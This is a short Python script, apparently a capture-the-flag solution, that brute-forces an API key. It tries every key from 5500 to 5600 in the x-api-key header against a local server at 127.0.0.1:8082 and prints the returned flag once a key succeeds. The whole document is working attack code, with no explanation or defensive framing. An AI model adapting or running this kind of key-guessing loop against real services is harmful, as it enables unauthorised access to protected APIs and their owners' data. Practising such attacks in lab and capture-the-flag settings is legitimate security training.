import urllib.request
import json

for key in range(5500, 5601):
    url = "http://127.0.0.1:8082"
    req = urllib.request.Request(url)
    req.add_header('x-api-key', str(key))
    response = urllib.request.urlopen(req).read()
    response_dict = json.loads(response.decode())
    if response_dict["success"] == "true":
        print("Success! The key is: ", key)
        print("Flag: ", response_dict["flag"])
        break
    else:
        print("Tried key: ", key, " but unsuccessful")